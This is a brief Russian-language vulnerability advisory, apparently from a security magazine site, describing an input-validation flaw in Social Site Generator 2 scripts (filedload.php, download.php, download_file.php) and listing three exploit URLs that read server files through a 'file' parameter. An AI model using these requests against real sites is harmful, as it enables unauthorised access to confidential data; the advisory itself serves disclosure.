Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: Social Site Generator 2
Уязвимость позволяет удаленному злоумышленнику получить несанкционированный
доступ к конфиденциальной информации на целевой системе. Уязвимость существует
из-за ошибки в проверке входных данных в сценариях filedload.php, download.php и
download_file.php. Атакующий может получить несанкционированный доступ к
конфиденциальной информации на целевой системе.
Эксплоит:
http://target/path/filedload.php?file=filedload.php
http://target/path/webadmin/download.php?file=download.php
http://target/path/webadmin/download_file.php